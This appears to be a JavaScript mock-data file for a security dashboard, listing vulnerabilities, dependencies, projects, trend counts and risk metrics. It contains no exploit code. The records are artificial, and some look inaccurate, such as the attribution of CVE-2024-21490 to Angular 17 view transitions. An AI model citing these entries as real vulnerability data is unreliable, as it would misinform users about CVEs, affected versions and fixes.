    daysDiscovered: 22,
    description: "Angular version 17 has a ReDoS vulnerability in the ViewTransitionInfo implementation. The router URL parsing is vulnerable to regular expression denial of service attacks.",
    technicalDetails: "The Angular router's URL parsing regex for view transitions can be triggered to run in exponential time with crafted URLs.",
    impact: "DoS in Angular 17 applications using the View Transitions API.",
    references: [
      "https://nvd.nist.gov/vuln/detail/CVE-2024-21490",
      "https://github.com/angular/angular/security/advisories/GHSA-9crc-q9x8-hgqq"
    ],
    relatedCVEs: [],
    remediation: "Upgrade @angular/core to 17.2.0 or later.",
    remediationSteps: [
      "ng update @angular/core@17",
      "Test routing and view transitions after update"
    ],
    dependencyPath: ["app", "@angular/core"],
    project: "Frontend App"
  },
  {
    id: "ZERO-DAY-2024-001",
    name: "Undisclosed Zero-Day - Internal Discovery",
    cweId: "CWE-119",
    cweName: "Improper Restriction of Operations within Memory Buffer",
    package: "internal-auth-lib",
    packageVersion: "3.1.0",
    affectedVersions: ["3.0.0", "3.1.0"],
    fixedVersion: null,
    cvssScore: null,
    cvssVector: null,
    cvssComponents: null,
    severity: "CRITICAL",
    exploitability: "UNKNOWN",
    exploitDetails: "Internally discovered zero-day. Not yet publicly disclosed. CVSS score pending CVE assignment.",
    fixAvailable: false,
    discoveryDate: "2024-02-01",
    publicationDate: null,
    daysDiscovered: 13,
    description: "An internally discovered memory safety issue in our authentication library. The vulnerability has been reported to the vendor and is pending a CVE assignment. Details withheld pending coordinated disclosure.",
    technicalDetails: "Buffer operations in the token parsing module may allow out-of-bounds memory access under specific conditions.",
    impact: "Potential authentication bypass or memory corruption. Severity under assessment.",
    references: [],
    relatedCVEs: [],
    remediation: "Monitor for vendor patch. Apply temporary mitigations: add authentication request size limits.",
    remediationSteps: [
      "Add maximum token size validation (< 4KB)",
      "Monitor authentication service for anomalous requests",
      "Prepare rollback plan for auth library version 2.x",
      "Await CVE assignment and vendor patch"
    ],
    dependencyPath: ["app", "internal-auth-lib"],
    project: "Auth Service"
  }
];

// ============================================================
// DEPENDENCIES DATA
// ============================================================
export const dependencies = [
  {
    id: "dep-001",
    name: "react",
    version: "18.2.0",
    license: "MIT",
    latestVersion: "18.2.0",
    isOutdated: false,
    daysSinceUpdate: 120,
    maintenanceStatus: "active",
    vulnerabilityCount: 0,
    directDependency: true,
    dependsOn: ["loose-envify", "scheduler"],
    type: "runtime",
    description: "React is a JavaScript library for building user interfaces."
  },
  {
    id: "dep-002",
    name: "log4j-core",
    version: "2.14.1",
    license: "Apache-2.0",
    latestVersion: "2.21.1",
    isOutdated: true,
    daysSinceUpdate: 827,
    maintenanceStatus: "active",
    vulnerabilityCount: 4,
    directDependency: false,
    dependsOn: ["log4j-api"],
    type: "runtime",
    description: "Apache Log4j Core - the logging library at the center of Log4Shell."
  },
  {
    id: "dep-003",
    name: "lodash",
    version: "4.17.20",
    license: "MIT",
    latestVersion: "4.17.21",
    isOutdated: true,
    daysSinceUpdate: 758,
    maintenanceStatus: "active",
    vulnerabilityCount: 1,
    directDependency: true,
    dependsOn: [],
    type: "runtime",
    description: "A modern JavaScript utility library delivering modularity, performance, & extras."
  },
  {
    id: "dep-004",
    name: "express",
    version: "4.18.2",
    license: "MIT",
    latestVersion: "4.18.2",
    isOutdated: false,
    daysSinceUpdate: 30,
    maintenanceStatus: "active",
    vulnerabilityCount: 0,
    directDependency: true,
    dependsOn: ["accepts", "body-parser", "qs", "path-to-regexp"],
    type: "runtime",
    description: "Fast, unopinionated, minimalist web framework for node."
  },
  {
    id: "dep-005",
    name: "qs",
    version: "6.10.0",
    license: "BSD-3-Clause",
    latestVersion: "6.11.0",
    isOutdated: true,
    daysSinceUpdate: 475,
    maintenanceStatus: "active",
    vulnerabilityCount: 1,
    directDependency: false,
    dependsOn: [],
    type: "runtime",
    description: "A querystring parsing and stringifying library with some added security."
  },
  {
    id: "dep-006",
    name: "jsonwebtoken",
    version: "8.5.1",
    license: "MIT",
    latestVersion: "9.0.2",
    isOutdated: true,
    daysSinceUpdate: 450,
    maintenanceStatus: "active",
    vulnerabilityCount: 3,
    directDependency: true,
    dependsOn: ["jws", "lodash.includes", "semver"],
    type: "runtime",
    description: "JSON Web Token implementation."
  },
  {
    id: "dep-007",
    name: "axios",
    version: "1.6.5",
    license: "MIT",
    latestVersion: "1.6.5",
    isOutdated: false,
    daysSinceUpdate: 45,
    maintenanceStatus: "active",
    vulnerabilityCount: 0,
    directDependency: true,
    dependsOn: ["follow-redirects", "form-data", "proxy-from-env"],
    type: "runtime",
    description: "Promise based HTTP client for the browser and node.js"
  },
  {
    id: "dep-008",
    name: "vm2",
    version: "3.9.14",
    license: "MIT",
    latestVersion: "3.9.19",
    isOutdated: true,
    daysSinceUpdate: 344,
    maintenanceStatus: "deprecated",
    vulnerabilityCount: 3,
    directDependency: true,
    dependsOn: [],
    type: "runtime",
    description: "DEPRECATED: A sandbox that can run untrusted code with whitelisted Node.js built-in modules."
  },
  {
    id: "dep-009",
    name: "moment",
    version: "2.29.3",
    license: "MIT",
    latestVersion: "2.29.4",
    isOutdated: true,
    daysSinceUpdate: 618,
    maintenanceStatus: "maintenance",
    vulnerabilityCount: 1,
    directDependency: true,
    dependsOn: [],
    type: "runtime",
    description: "Parse, validate, manipulate, and display dates. LEGACY: Use date-fns or dayjs instead."
  },
  {
    id: "dep-010",
    name: "webpack",
    version: "5.89.0",
    license: "MIT",
    latestVersion: "5.89.0",
    isOutdated: false,
    daysSinceUpdate: 90,
    maintenanceStatus: "active",
    vulnerabilityCount: 0,
    directDependency: true,
    dependsOn: ["@webassemblyjs/ast", "acorn", "browserslist", "terser-webpack-plugin"],
    type: "devDependency",
    description: "A bundler for javascript and friends."
  },
  {
    id: "dep-011",
    name: "socket.io",
    version: "4.6.1",
    license: "MIT",
    latestVersion: "4.6.2",
    isOutdated: true,
    daysSinceUpdate: 292,
    maintenanceStatus: "active",
    vulnerabilityCount: 1,
    directDependency: true,
    dependsOn: ["socket.io-parser", "engine.io", "socket.io-adapter"],
    type: "runtime",
    description: "Realtime application framework (Node.JS server)."
  },
  {
    id: "dep-012",
    name: "openssl",
    version: "3.0.6",
    license: "Apache-2.0",
    latestVersion: "3.2.0",
    isOutdated: true,
    daysSinceUpdate: 500,
    maintenanceStatus: "active",
    vulnerabilityCount: 2,
    directDependency: false,
    dependsOn: [],
    type: "system",
    description: "TLS/SSL and crypto library."
  },
  {
    id: "dep-013",
    name: "node-forge",
    version: "0.9.0",
    license: "BSD/GPL",
    latestVersion: "1.3.1",
    isOutdated: true,
    daysSinceUpdate: 1291,
    maintenanceStatus: "active",
    vulnerabilityCount: 2,
    directDependency: false,
    dependsOn: [],
    type: "runtime",
    description: "A native implementation of TLS in JavaScript and tools for writing crypto-based and network-heavy webapps."
  },
  {
    id: "dep-014",
    name: "request",
    version: "2.88.2",
    license: "Apache-2.0",
    latestVersion: "2.88.2",
    isOutdated: true,
    daysSinceUpdate: 1800,
    maintenanceStatus: "deprecated",
    vulnerabilityCount: 1,
    directDependency: true,
    dependsOn: ["form-data", "tough-cookie", "http-signature"],
    type: "runtime",
    description: "DEPRECATED: Simplified HTTP request client. Use axios or got instead."
  },
  {
    id: "dep-015",
    name: "@babel/traverse",
    version: "7.23.0",
    license: "MIT",
    latestVersion: "7.23.9",
    isOutdated: true,
    daysSinceUpdate: 155,
    maintenanceStatus: "active",
    vulnerabilityCount: 1,
    directDependency: false,
    dependsOn: ["@babel/code-frame", "@babel/generator", "@babel/types"],
    type: "devDependency",
    description: "The Babel traversal module."
  }
];

// ============================================================
// PROJECTS DATA
// ============================================================
export const projects = [
  {
    id: "proj-001",
    name: "Backend API",
    description: "Node.js REST API serving mobile and web applications",
    riskScore: 87,
    totalDependencies: 156,
    directDependencies: 42,
    criticalCount: 8,
    highCount: 15,
    mediumCount: 23,
    lowCount: 12,
    lastScan: "2024-02-14T10:30:00Z",
    language: "JavaScript/Node.js",
    packageFile: "package.json",
    status: "critical"
  },
  {
    id: "proj-002",
    name: "Frontend App",
    description: "React SPA for end-user dashboard",
    riskScore: 45,
    totalDependencies: 234,
    directDependencies: 31,
    criticalCount: 2,
    highCount: 7,
    mediumCount: 18,
    lowCount: 22,
    lastScan: "2024-02-14T11:00:00Z",
    language: "JavaScript/React",
    packageFile: "package.json",
    status: "medium"
  },
  {
    id: "proj-003",
    name: "Data Processing Service",
    description: "Python data pipeline for analytics",
    riskScore: 62,
    totalDependencies: 89,
    directDependencies: 28,
    criticalCount: 3,
    highCount: 9,
    mediumCount: 14,
    lowCount: 8,
    lastScan: "2024-02-13T15:00:00Z",
    language: "Python",
    packageFile: "requirements.txt",
    status: "high"
  },
  {
    id: "proj-004",
    name: "Auth Service",
    description: "Authentication and authorization microservice",
    riskScore: 78,
    totalDependencies: 67,
    directDependencies: 18,
    criticalCount: 5,
    highCount: 6,
    mediumCount: 11,
    lowCount: 4,
    lastScan: "2024-02-14T09:00:00Z",
    language: "JavaScript/Node.js",
    packageFile: "package.json",
    status: "high"
  },
  {
    id: "proj-005",
    name: "Infrastructure",
    description: "Infrastructure as Code and container definitions",
    riskScore: 55,
    totalDependencies: 45,
    directDependencies: 12,
    criticalCount: 2,
    highCount: 5,
    mediumCount: 8,
    lowCount: 6,
    lastScan: "2024-02-12T12:00:00Z",
    language: "Dockerfile/Terraform",
    packageFile: "Dockerfile",
    status: "medium"
  }
];

// ============================================================
// TREND DATA (12 months of vulnerability discovery data)
// ============================================================
export const trendData = [
  { month: "Mar '23", critical: 2, high: 5, medium: 8, low: 3, total: 18 },
  { month: "Apr '23", critical: 3, high: 7, medium: 10, low: 4, total: 24 },
  { month: "May '23", critical: 2, high: 6, medium: 9, low: 5, total: 22 },
  { month: "Jun '23", critical: 4, high: 8, medium: 12, low: 6, total: 30 },
  { month: "Jul '23", critical: 3, high: 7, medium: 11, low: 4, total: 25 },
  { month: "Aug '23", critical: 5, high: 9, medium: 14, low: 7, total: 35 },
  { month: "Sep '23", critical: 4, high: 8, medium: 13, low: 5, total: 30 },
  { month: "Oct '23", critical: 6, high: 11, medium: 16, low: 8, total: 41 },
  { month: "Nov '23", critical: 5, high: 10, medium: 15, low: 6, total: 36 },
  { month: "Dec '23", critical: 7, high: 12, medium: 18, low: 9, total: 46 },
  { month: "Jan '24", critical: 8, high: 14, medium: 20, low: 10, total: 52 },
  { month: "Feb '24", critical: 10, high: 15, medium: 23, low: 12, total: 60 },
];

// ============================================================
// CALCULATED METRICS
// ============================================================
export const dashboardMetrics = {
  overallRiskScore: 72,
  totalDependencies: 591,
  criticalCount: vulnerabilities.filter(v => v.severity === 'CRITICAL').length,
  highCount: vulnerabilities.filter(v => v.severity === 'HIGH').length,
  mediumCount: vulnerabilities.filter(v => v.severity === 'MEDIUM').length,
  lowCount: vulnerabilities.filter(v => v.severity === 'LOW').length,
  projectsAtRisk: 4,
  fixAvailableCount: vulnerabilities.filter(v => v.fixAvailable).length,
  noFixCount: vulnerabilities.filter(v => !v.fixAvailable).length,
  knownExploitCount: vulnerabilities.filter(v => v.exploitability === 'KNOWN_EXPLOIT').length,
  lastScanDate: "2024-02-14T11:30:00Z",
  avgDaysToFix: 14,
  fixRate: "78%"
};
